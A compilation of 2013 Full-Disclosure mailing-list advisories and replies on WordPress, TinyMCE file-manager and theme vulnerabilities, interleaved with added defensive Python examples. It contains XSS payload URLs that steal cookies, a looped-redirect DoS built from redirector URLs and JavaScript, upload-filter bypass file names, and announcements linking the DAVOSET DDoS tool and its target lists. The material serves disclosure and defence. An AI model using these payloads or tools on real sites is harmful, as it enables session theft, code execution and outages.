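        for raw in COOKIE_RE.findall(line):
            value = unquote(raw)
            if not is_acceptable_hash(value, max_count_log2):
                findings.append((n, value, phpass_iterations(value)))
    return findings


# Constructed sample log lines; the 32 "a" characters stand in for the
# per-site cookie hash suffix.
SAMPLE_LOG = [
    '10.0.0.5 "GET /?p=4 HTTP/1.1" 200 "wp-postpass_' + "a" * 32
    + '=%24P%24BabcdefghIJKLmnopqrstuvwxyz012345"',
    '10.0.0.9 "GET /?p=4 HTTP/1.1" 200 "wp-postpass_' + "a" * 32
    + '=%24P%24Spaddding"',
]

if __name__ == "__main__":
    for finding in over_cost_postpass_cookies(SAMPLE_LOG):
        print(finding)  # (2, '$P$Spaddding', 1073741824)
```

The check belongs before the hash is handed to the password verifier: a cost above the configured one can only come from a forged cookie, since the server never issues one.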
Re: [Full-disclosure] Denial of Service in WordPress
Hello Michal!

Yes, of course there are a lot of ways to make cross-site requests. But what is the benefit of using Looped DoS - do you see it? Looks like you don't. I'll explain for you.

One standard request (via img and other tags in HTML, etc.) leads to a single request to the target site. One request using a Looped DoS hole (such a hole by itself or artificially created from looping two redirectors) leads to 21 requests - in case of using a redirector/redirectors with server headers (after the 21st request modern browsers will stop it). And in case there is an old IE or an "unlimited bot", or my bypass techniques are used (using JS or meta-refresh in at least one of the two redirectors) to bypass the browsers' restriction - one request leads to an infinite number of requests. I.e. this is 21 times / infinitely more effective for the attack.

And besides using a link, frame or iframe to lead to Looped DoS, it's also possible to use other standard methods for making a request. Such as img or other tags (in this case only server-header redirectors must be used). Which creates 21 (for modern browsers) or an infinite number of requests (for old IE) from one image. Put a lot of images on forums and other sites which allow the img tag (via html or bbcode) leading to Looped DoS and there will be a lot of requests from a single visitor of that page.

> Browsers detect redirect loops to prevent accidental mishaps and simplify troubleshooting, not to stop malicious attacks.

Yes, you are right. But exactly this functionality to stop redirect loops (in all modern browsers) can help mitigate such attacks. Just not all techniques of this attack. Also remember that your company's browser Chrome (and some other vendors too) was trying to prevent looped redirects using JS, but not well enough - as I showed in my Refresh DoS attack in 2008 in my project Day of bugs in browsers. So browser vendors need to improve their redirect loop protection.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: "Michal Zalewski"
To: "MustLive"
Cc: "Ryan Dewhurst"; "full-disclosure"
Sent: Friday, June 28, 2013 9:19 AM
Subject: Re: [Full-disclosure] Denial of Service in WordPress

> Attack exactly overload web sites presented in endless loop of redirects. As I showed in all cases of Looped DoS vulnerabilities in web sites and web applications, which I wrote about during 2008 (when I created this type of attacks) - 2013.

You do realize that any browser can be made to issue a *lot* of requests to any other destination on the web - say, by instantiating a bunch of images, leveraging CORS, navigating iframes, etc?

Browsers detect redirect loops to prevent accidental mishaps and simplify troubleshooting, not to stop malicious attacks.

/mz
[Full-disclosure] DAVOSET v.1.0.8
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On Friday, 28.06.2013, DAVOSET v.1.0.8 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.0.8:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.8.rar

Use, don't abuse.

Among other improvements in the new version, in 1.0.8 support of POST requests was added. So now you can use Abuse of Functionality vulnerabilities at web sites which require POST. Also a new service was added into both lists of zombies (exactly for POST requests).

With the adding of support of POST requests to vulnerable sites, the format of the file with the list of zombie-servers was also changed. The new format of the file is backward-compatible with the previous format.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] Denial of Service in WordPress
ress, including WP 3.5.2). The more time people spend on a particular page with an injected iframe with the endless redirect, and the more people are visiting such sites, the more effect there will be. No need to ask people to "participate in a DoS attack"; their browser will be automatically "participating" via the Looped DoS attack (just by entering this endless loop in any way).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: Ryan Dewhurst
To: MustLive
Cc: submissi...@packetstormsecurity.org; full-disclosure; 1337 Exploit DataBase
Sent: Thursday, June 27, 2013 8:34 PM
Subject: Re: [Full-disclosure] Denial of Service in WordPress

This just affects the client though right? So doesn't DoS a WordPress blog, just presents an error message to the user if they click on a crafted link. How could this be used in the real world to cause any risk? From my understanding you'd have to get the user to click on the tinyurl, which would then show them a browser redirect error? If this is the case, how does this benefit an attacker?

On Thu, Jun 27, 2013 at 7:28 PM, MustLive wrote:

Hello list!

These are Denial of Service vulnerabilities in WordPress, which I've disclosed two days ago (http://websecurity.com.ua/6600/).

About XSS vulnerabilities in WordPress, which exist in two redirectors, I wrote last year (http://seclists.org/fulldisclosure/2012/Mar/343). About Redirector vulnerabilities in these WP scripts I wrote already in 2007 (and made patches for them). The developers fixed the redirectors in WP 2.3, so Redirector and XSS attacks are possible only in previous versions.

As I've recently checked, this functionality can be used for conducting DoS attacks. I.e. to make Looped DoS vulnerabilities from two redirectors (according to the Classification of DoS vulnerabilities in web applications (http://websecurity.com.ua/2663/)), by combining a web site on WordPress with a redirecting service or other site. This attack is similar to looping two redirectors, described in my articles Redirectors' hell and Hellfire for redirectors. The interesting thing is that the looped redirector (http://tinyurl.com/hellfire-url), which I made on the 5th of February 2009 for my article Hellfire for redirectors, is still working.

- Affected products:

Vulnerable are all versions of WordPress: for the easy attack - WP 2.2.3 and previous versions, for the harder attack - WP 3.5.2 and previous versions. The second variant of the attack requires a Redirector or XSS vulnerability at the same domain as the web site on WP.

-- Details: --

Denial of Service (WASC-10):

It's needed to create a Custom alias at tinyurl.com or another redirector service, which will be leading to wp-login.php or wp-pass.php, setting the alias for redirection.

http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1
http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2

Here are examples of these vulnerabilities:

http://tinyurl.com/loopeddos1
http://tinyurl.com/loopeddos2

This attack will work for WordPress < 2.3. At that, Mozilla, Firefox, Chrome and Opera will stop the endless redirect after a series of requests, unlike IE.

To make this attack work in all versions of the engine, including WordPress 3.5.2, it's needed that the redirector is on the same domain as the web site on WP. For this any vulnerability can be used, e.g. reflected XSS or persistent XSS (at the same domain), for including a script redirecting to one of these redirectors:

WordPress_Looped_DoS.html

<script>
document.location="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html";
</script>

WordPress_Looped_DoS-2.html

<script>
document.location="http://site/wp-pass.php";
</script>

This attack will work in WordPress 3.5.2 and previous versions, as it isn't stopped by the browsers (endless redirect).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Denial of Service in WordPress
Hello list!

These are Denial of Service vulnerabilities in WordPress, which I've disclosed two days ago (http://websecurity.com.ua/6600/).

About XSS vulnerabilities in WordPress, which exist in two redirectors, I wrote last year (http://seclists.org/fulldisclosure/2012/Mar/343). About Redirector vulnerabilities in these WP scripts I wrote already in 2007 (and made patches for them). The developers fixed the redirectors in WP 2.3, so Redirector and XSS attacks are possible only in previous versions.

As I've recently checked, this functionality can be used for conducting DoS attacks. I.e. to make Looped DoS vulnerabilities from two redirectors (according to the Classification of DoS vulnerabilities in web applications (http://websecurity.com.ua/2663/)), by combining a web site on WordPress with a redirecting service or other site. This attack is similar to looping two redirectors, described in my articles Redirectors' hell and Hellfire for redirectors. The interesting thing is that the looped redirector (http://tinyurl.com/hellfire-url), which I made on the 5th of February 2009 for my article Hellfire for redirectors, is still working.

- Affected products:

Vulnerable are all versions of WordPress: for the easy attack - WP 2.2.3 and previous versions, for the harder attack - WP 3.5.2 and previous versions. The second variant of the attack requires a Redirector or XSS vulnerability at the same domain as the web site on WP.

-- Details: --

Denial of Service (WASC-10):

It's needed to create a Custom alias at tinyurl.com or another redirector service, which will be leading to wp-login.php or wp-pass.php, setting the alias for redirection.

http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1
http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2

Here are examples of these vulnerabilities:

http://tinyurl.com/loopeddos1
http://tinyurl.com/loopeddos2

This attack will work for WordPress < 2.3. At that, Mozilla, Firefox, Chrome and Opera will stop the endless redirect after a series of requests, unlike IE.

To make this attack work in all versions of the engine, including WordPress 3.5.2, it's needed that the redirector is on the same domain as the web site on WP. For this any vulnerability can be used, e.g. reflected XSS or persistent XSS (at the same domain), for including a script redirecting to one of these redirectors:

WordPress_Looped_DoS.html

<script>
document.location="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html";
</script>

WordPress_Looped_DoS-2.html

<script>
document.location="http://site/wp-pass.php";
</script>

This attack will work in WordPress 3.5.2 and previous versions, as it isn't stopped by the browsers (endless redirect).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
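The thread above turns on two properties of redirectors: whether the application lets a request parameter send the browser to an arbitrary host, and whether a client keeps following a chain that never terminates. The following is an added example, not code from the advisory or from WordPress, showing the two defensive checks that break the "two redirectors pointing at each other" pattern: a same-origin allowlist for redirect targets (the behaviour a safe-redirect helper should have) and a bounded, loop-detecting redirect follower for server-side HTTP clients such as crawlers or link previewers, which lack a browser's built-in cap. The host names, the hop cap and the toy response table are assumptions constructed for the example.

```python
"""Defensive handling of redirect targets and redirect chains."""
from urllib.parse import urlsplit, urljoin

# Assumed cap; modern browsers stop after a similar number of hops.
MAX_REDIRECTS = 20
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_safe_redirect(target, allowed_hosts):
    """True only if `target` is a relative path or an http(s) URL on an allowed host.

    Rejects other schemes (javascript:, data:), protocol-relative "//host" and
    backslash-prefixed targets that some clients treat as host separators.
    """
    if target.startswith(("//", "\\")) or "\x00" in target:
        return False
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False
    if parts.netloc == "":
        return True  # relative URL: stays on the current site
    return parts.hostname in allowed_hosts


def follow_redirects(start_url, fetch, max_redirects=MAX_REDIRECTS):
    """Follow Location headers using `fetch(url) -> (status, location_or_None)`.

    Returns (final_url, chain, reason) with reason one of "ok", "loop",
    "too_many". A URL seen twice is reported as a loop instead of being
    fetched again; the hop cap covers long chains that never repeat.
    """
    url = start_url
    chain = [url]
    seen = {url}
    for _ in range(max_redirects):
        status, location = fetch(url)
        if status not in REDIRECT_STATUSES or location is None:
            return url, chain, "ok"
        url = urljoin(url, location)  # Location may be relative
        chain.append(url)
        if url in seen:
            return url, chain, "loop"
        seen.add(url)
    return url, chain, "too_many"


# Constructed toy responses: a logout redirector and a URL shortener pointing
# at each other, the shape described in the advisory.
LOOP_URL = ("http://blog.example/wp-login.php?action=logout"
            "&redirect_to=http://short.example/loop")
TOY_RESPONSES = {
    LOOP_URL: (302, "http://short.example/loop"),
    "http://short.example/loop": (301, LOOP_URL),
    "http://blog.example/wp-admin/": (200, None),
}


def toy_fetch(url):
    """Offline stand-in for an HTTP client; unknown URLs answer 200."""
    return TOY_RESPONSES.get(url, (200, None))


if __name__ == "__main__":
    print(is_safe_redirect("http://short.example/loop", {"blog.example"}))  # False
    print(is_safe_redirect("/wp-admin/", {"blog.example"}))                 # True
    print(follow_redirects(LOOP_URL, toy_fetch))  # (..., [3 URLs], 'loop')
```

With the allowlist in place the off-site hop is never issued, so the shortener's half of the loop is unreachable from the application; the follower is the belt-and-braces check for any client that fetches URLs on a user's behalf.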
[Full-disclosure] DAVOSET v.1.0.7
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On Friday, 21.06.2013, DAVOSET v.1.0.7 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.0.7:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.7.rar

Use, don't abuse.

Among other improvements in the new version, in 1.0.7 non-working URLs of services were removed from both zombies lists and new vulnerable services were added. The total number of zombie URLs was left the same: 20 and 30 in the two lists.

In particular, I've removed Babelfish from the lists, since Yahoo closed it already in 2012. Instead of fixing the Cross-Site Scripting, Abuse of Functionality and Insufficient Anti-automation vulnerabilities in their Babelfish service, about which I informed them already in 2009, they first ignored these holes and after three years completely closed the service. This is the fate of all holed web sites. But there are a lot of other vulnerable sites, so the lists will be updated.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.0.6
Hello participants of Mailing List.

After releasing the previous version of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've released DAVOSET v.1.0.6 - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/), on Tuesday, 18.06.2013.

Download DAVOSET v.1.0.6:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.6.rar

Use, don't abuse.

The important change in version 1.0.6 is that I put an updated version of list_full.txt into the bundle. Already in 2010, specially for conducting my research described in the article about DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), I made two lists of zombie servers: the basic list (list.txt) with 20 services and the extended list (list_full.txt) with all services found by me which can be used as zombie-servers with DAVOSET. For the last three years I was updating the extended list with new services (the admins of these services were informed by me, but they ignored fixing the vulnerabilities). I hadn't released this list in version 1.0.5, but added it to the bundle of version 1.0.6.

And today I'm planning to release a new version of the tool with additional improvements.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] FPD, XSS and CS vulnerabilities in Slash WP theme for WordPress
Hello list!

I want to warn you about multiple vulnerabilities in Slash WP theme for WordPress. This is a commercial theme for WP. These are Full path disclosure, Cross-Site Scripting and Content Spoofing vulnerabilities.

- Affected products:

Vulnerable are all versions of Slash WP theme for WordPress. After I informed the developers about these vulnerabilities in April, they just thanked me and promised to look at these vulnerabilities. There is no information on whether they have fixed these holes already or when they are planning to do it. So all users of the theme should contact the developers for updates.

- Affected vendors:

Dream-Theme
http://dream-theme.com

-- Details: --

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD in index.php and other php-files in the plugin's folder and subfolders.

Cross-Site Scripting (WASC-08):

In the theme there are jPlayer 2.1.0 and JW Player 5.8.2011, about vulnerabilities in which I wrote earlier (in 2012 and 2013).

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

There is a flash file of JW Player at some sites with this theme, but not at others. According to the theme's description, the theme has built-in support of JW Player, but it's not included in the standard bundle (only jPlayer). But it can be installed separately, and some web site owners do it.

Content Spoofing (WASC-12):

About Content Spoofing vulnerabilities and about other XSS vulnerabilities in JW Player (http://securityvulns.com/docs28176.html) and in jPlayer (http://securityvulns.com/docs29316.html), you can read in the corresponding advisories.

Timeline:

2013.04.11 - announced at my site.
2013.04.12 - informed developers.
2013.06.20 - disclosed at my site (http://websecurity.com.ua/6440/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DDoS attacks via other sites execution tool
Hello participants of Mailing List.

If you haven't read my article (written in 2010; last week I wrote about it to the WASC list) "Advantages of attacks on sites with using other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html), feel free to do so. In this article I reminded you about using sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html), the DDoS attacks via other sites execution tool (DAVOSET) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), sending spam via sites and creating spam-botnets (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html), and wrote about the advantages of attacks on sites using other sites.

Last week I published my DDoS attacks via other sites execution tool online (http://websecurity.com.ua/davoset/). It's a tool for conducting DDoS attacks via Abuse of Functionality vulnerabilities on sites, which I made in 2010. The description and changelog in English are presented at my site, where you can get my DAVOSET v.1.0.5 (made on 18.07.2010). This is the last version of my DAVOSET; after that I stopped its development. But now I am planning to continue development of the software and to release new versions (I'll release v.1.0.6 today).

For three years I held this tool privately, but now I have released it for free access. So everyone can test Abuse of Functionality vulnerabilities at multiple web sites - like Google's sites, W3C and many others, which I informed many times over many years (I have been informing admins of web sites about such vulnerabilities since 2007), but which ignored them and have not wanted to fix these holes for a long time; Google, for example, continued to create new services with Abuse of Functionality and Insufficient Anti-automation vulnerabilities, which can be used for such DoS and DDoS attacks.

It must bring attention to the danger of these vulnerabilities (which I was trying to do in my articles in 2010), because in most cases owners of web sites and web developers ignore them and don't fix them. They can be used for DoS attacks both on other sites and on the sites with Abuse of Functionality vulnerabilities themselves, about which I wrote in my article "Using of the sites for attacks on other sites".

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
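The "Abuse of Functionality" and "Insufficient Anti-automation" holes the post relies on are a site feature that fetches any URL a visitor hands it, as often as the visitor asks. The following is an added example, not part of the post and not DAVOSET code, showing the two controls such a feature needs so it cannot be used as a relay: an exact-host allowlist (contrasted with the substring "domain restriction" that is trivially bypassed) and a per-client rate limit. The host names, addresses and limits are assumptions made up for the example.

```python
"""Target allowlist and per-client rate limit for a URL-fetching feature.

Added example; it is not part of the original post and not DAVOSET code.
A site feature that fetches a user-supplied URL on request (an image
proxy, a feed fetcher, a validator) becomes a relay against third parties
when it accepts any destination and any request rate. The two functions
below contrast a substring 'domain restriction' with an exact-host
allowlist, and the class adds a sliding-window limit per client. The host
names, addresses and limits are assumptions made up for this example.
"""
import ipaddress
import time
from collections import deque
from typing import Deque, Dict, Optional
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"maps.example.com", "tiles.example.com"}  # assumed allowlist


def naive_allowed(url: str) -> bool:
    """Substring match on the whole URL: the easily bypassed 'domain restriction'."""
    return any(host in url for host in ALLOWED_HOSTS)


def strict_allowed(url: str, resolved_ip: Optional[str] = None) -> bool:
    """Allow only http(s) URLs whose exact hostname is on the allowlist.

    resolved_ip is the address the hostname resolved to; it is passed in so
    the example runs offline. Loopback, private, link-local and reserved
    targets are refused so the feature cannot be pointed at internal hosts.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False  # 'allowed.host@evil' style credentials in the authority
    host = (parts.hostname or "").rstrip(".").lower()
    if host not in ALLOWED_HOSTS:
        return False
    if resolved_ip is not None:
        ip = ipaddress.ip_address(resolved_ip)
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True


class RateLimiter:
    """At most `limit` fetches per client in any `window`-second span."""

    def __init__(self, limit: int, window: float) -> None:
        self.limit = limit
        self.window = window
        self._hits: Dict[str, Deque[float]] = {}

    def allow(self, client: str, now: Optional[float] = None) -> bool:
        """Record one request from `client` and say whether it may proceed."""
        now = time.monotonic() if now is None else now
        q = self._hits.setdefault(client, deque())
        while q and now - q[0] > self.window:
            q.popleft()  # forget hits that left the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def fetch_decision(url: str, client: str, limiter: RateLimiter,
                   resolved_ip: Optional[str] = None,
                   now: Optional[float] = None) -> str:
    """Combine both checks; returns 'ok', 'forbidden-target' or 'rate-limited'."""
    if not strict_allowed(url, resolved_ip):
        return "forbidden-target"
    if not limiter.allow(client, now):
        return "rate-limited"
    return "ok"
```

The substring check passes `http://maps.example.com.attacker.test/` and `http://attacker.test/?u=maps.example.com`, while the exact-host check refuses both; the rate limiter is what turns a relay of unbounded throughput into one that is not worth abusing.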
[Full-disclosure] IA and AFU vulnerabilities in aCMS
Hello list!

These are Insufficient Authorization and Arbitrary File Uploading vulnerabilities in aCMS. This is a commercial CMS. There are multiple vulnerabilities in aCMS and this is the second part of them.

- Affected products: -

Vulnerable are aCMS 1.0 and previous versions.

- Affected vendors: -

Almacor
http://almacor.ru

-- Details: --

Insufficient Authorization (WASC-02):

There is no restriction on accessing the file manager and image manager. This is not the default behavior (the developer of MCFileManager and MCImageManager states that by default these web applications require authorization) and was made so by the developers of aCMS.

http://site/assets/js/tiny_mce/plugins/filemanager/pages/fm/index.html
http://site/assets/js/tiny_mce/plugins/imagemanager/pages/im/index.html

Arbitrary File Uploading (WASC-31):

The plugins MCFileManager and MCImageManager for TinyMCE, which are used in the system, are vulnerable to execution of arbitrary code through bypass of the programs' security filters (on IIS and Apache web servers).

http://site/assets/js/tiny_mce/plugins/filemanager/pages/fm/index.html
http://site/assets/js/tiny_mce/plugins/imagemanager/pages/im/index.html

Code will execute via file uploading. The first program is vulnerable to three methods of code execution:

1. Via using the symbol ";" (1.asp;.txt) in the file name (IIS).
2. Via "1.asp" in the folder name (IIS).
3. Via a double extension (1.php.txt) (Apache with special configuration).

The second program is vulnerable to two methods of code execution (#1 and #3).

Timeline:

2013.03.04 - informed developers about part of the vulnerabilities.
2013.04.03 - informed developers about another part of the vulnerabilities.
2013.04.06 - announced at my site.
2013.04.07 - informed developers about another part of the vulnerabilities.
2013.05.25 - informed developers about another part of the vulnerabilities.
In all cases the developers just ignored all messages via different e-mails and the contact form.
2013.06.04 - disclosed at my site (http://websecurity.com.ua/6428/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] FPD and Security bypass vulnerabilities in AntiVirus for WordPress
Hello list!

These are Full path disclosure and Security bypass vulnerabilities in AntiVirus for WordPress. This is a security plugin for detecting exploits and backdoors in WordPress, which failed to identify my Backdoored Web Application (BWA) - a reference test of backdoor scanners (released in December).

Last week I published the article "Backdoor scanners testing among plugins for WordPress" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-May/008832.html), in which I described the results of testing multiple scanner plugins for WordPress and described methods of bypassing all of these scanners.

- Affected products: -

AntiVirus for WordPress 1.0 and previous versions. Versions from 1.1 to 1.3.4 are still vulnerable to Security bypass, but Full path disclosure was fixed by removing uninstall.php in 1.1.

- Affected vendors: -

AntiVirus for WordPress
http://wpantivirus.com

-- Details: --

Full path disclosure (WASC-13):

http://site/wp-content/plugins/antivirus/uninstall.php

Security bypass (WASC-31):

This security bypass allows injecting a PHP backdoor into the web site (for executing OS commands), which will not be identified by the plugin. All details about detection of BWA by the plugin and methods of the bypass are described in my article.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] FPD and Security bypass vulnerabilities in Exploit Scanner for WordPress
Hello list!

These are Full path disclosure and Security bypass vulnerabilities in Exploit Scanner for WordPress. This is a security plugin for detecting exploits and backdoors in WordPress, which failed to identify my Backdoored Web Application (BWA) - a reference test of backdoor scanners (released in December).

Last week I published the article "Backdoor scanners testing among plugins for WordPress" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-May/008832.html), in which I described the results of testing multiple scanner plugins for WordPress and described methods of bypassing all of these scanners. Exploit Scanner was the most bypassable scanner among the tested plugins.

- Affected products: -

Exploit Scanner for WordPress 1.3.3 and previous versions. Tested in Exploit Scanner 0.95, 1.0.4 and 1.3.3.

- Affected vendors: -

Exploit Scanner
http://wordpress.org/plugins/exploit-scanner/

-- Details: --

Full path disclosure (WASC-13):

http://site/wp-content/plugins/exploit-scanner/exploit-scanner.php

Security bypass (WASC-31):

This security bypass allows injecting a PHP backdoor into the web site (for executing OS commands), which will not be identified by the plugin. All details about detection of BWA by different versions of the plugin and methods of their bypass are described in my article.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Backdoor scanners testing
Hello participants of Full-Disclosure!

Today I wrote to the WASC mailing list about my backdoor scanners testing (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-May/008832.html). Last week I published the article with the results of the testing. I was planning to do this testing already in December, after I released my Backdoored Web Application (BWA) - a reference test of backdoor scanners (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-December/008630.html), but did it only in May.

In my article I examined different backdoor scanners among plugins for WordPress. Feel free to read it, if this topic is interesting for you.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and FPD vulnerabilities in I Love It New theme for WordPress
Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in the I Love It New theme for WordPress. This is a commercial (premium) theme. Earlier I wrote about vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21) and in multiple web applications.

- Affected products: -

All versions of the I Love It New theme for WordPress. The theme contains vulnerable versions of VideoJS and Audio Player.

Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to the mentioned XSS hole, except XSS via JS callbacks (as can be read in the repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to the last version of VideoJS.swf.

- Affected vendors: -

CosmoThemes
http://cosmothemes.com

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie)

http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=\%22))}catch(e){alert(document.cookie)}//

Full path disclosure (WASC-13):

There are FPD vulnerabilities in index.php and almost all other php-files (in the folder and subfolders).

http://site/wp-content/themes/iloveitnew/
http://site/wp-content/themes/iloveitnew/videojs/video-js.php
http://site/wp-content/themes/iloveitnew/videojs/admin.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] AFU vulnerabilities in MCImageManager for TinyMCE
Hello list!

I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is a commercial plugin for TinyMCE. It concerns both MCImageManager and all web applications which have MCImageManager in their bundle. These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers.

- Affected products: -

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.

- Affected vendors: -

Moxiecode
http://www.moxiecode.com

-- Details: --

Arbitrary File Uploading (WASC-31):

http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html

Execution of arbitrary code is possible due to bypass of the program's security filters (on IIS and Apache web servers). Code will execute via file uploading. The program is vulnerable to two methods of code execution:

1. Via using the symbol ";" (1.asp;.txt) in the file name (IIS).
2. Via a double extension (1.php.txt) (Apache with special configuration).

MCImageManager has only two such holes in comparison with three holes in MCFileManager (about which I wrote earlier). The attack via folder name was already not working in version 3.1.0.4. Both these web applications have other vulnerabilities, about which I'll write later.

Timeline:

2013.03.31 - briefly informed the developer (together with other issues related to TinyMCE).
2013.04.01 - informed the developer in detail.
2013.04.03 - announced at my site.
2013.04.04 - the developer planned to fix these holes in a new version in the nearest days.
2013.05.18 - disclosed at my site (http://websecurity.com.ua/6416/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] AFU vulnerabilities in MCFileManager for TinyMCE
Hello list!

I want to warn you about vulnerabilities in Moxiecode File Manager (MCFileManager). This is a commercial plugin for TinyMCE. It concerns both MCFileManager and all web applications which have MCFileManager in their bundle. These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers.

- Affected products: -

Vulnerable are Moxiecode File Manager 3.1.5 and previous versions.

- Affected vendors: -

Moxiecode
http://www.moxiecode.com

-- Details: --

Arbitrary File Uploading (WASC-31):

Execution of arbitrary code is possible due to bypass of the program's security filters (on IIS and Apache web servers). Code will execute via file uploading. The program is vulnerable to three methods of code execution:

1. Via using the symbol ";" (1.asp;.txt) in the file name (IIS).
2. Via "1.asp" in the folder name (IIS).
3. Via a double extension (1.php.txt) (Apache with special configuration).

Timeline:

2013.03.31 - briefly informed the developer (together with other issues related to TinyMCE).
2013.04.01 - informed the developer in detail.
2013.04.02 - announced at my site.
2013.04.04 - the developer planned to fix these holes in a new version in the nearest days.
2013.05.17 - disclosed at my site (http://websecurity.com.ua/6413/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
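The three upload tricks named in the MCFileManager, MCImageManager and aCMS advisories above (";" in the file name, an executable extension in a folder name, and a double extension) all defeat the same mistake: a filter that looks only at the text after the last dot. The following added example, which is not code from Moxiecode or Almacor, models that naive filter beside an allowlist check over the whole relative path. The extension lists and file names are assumptions for the example.

```python
"""Upload file-name checks against the three bypasses named in these posts.

Added example, not code from MCFileManager, MCImageManager or aCMS. The
three tricks the advisories list, ';' in the name ('1.asp;.txt', which an
old IIS truncates to 1.asp), an executable extension in a folder name
('1.asp/', beneath which IIS runs files as ASP) and a double extension
('1.php.txt', run as PHP by an Apache whose AddHandler matches 'php'
anywhere in the name), all pass a filter that only looks at the text after
the last dot. The naive filter below models that mistake; the strict one
checks every path component, refuses separator characters and applies an
extension allowlist to the single extension it permits. The extension lists
are assumptions.
"""
import re
from typing import Tuple

# Server-side executable extensions a blocklist would try to catch (assumed).
EXEC_EXT = {"php", "php3", "php5", "phtml", "asp", "aspx", "asa", "cer", "jsp", "cgi", "pl"}
# What an image/file manager is expected to store (assumed allowlist).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "txt", "pdf"}
FOLDER_RE = re.compile(r"[A-Za-z0-9_-]+")                    # no dots in folder names
FILE_RE = re.compile(r"[A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)?")   # at most one extension


def naive_is_allowed(path: str) -> bool:
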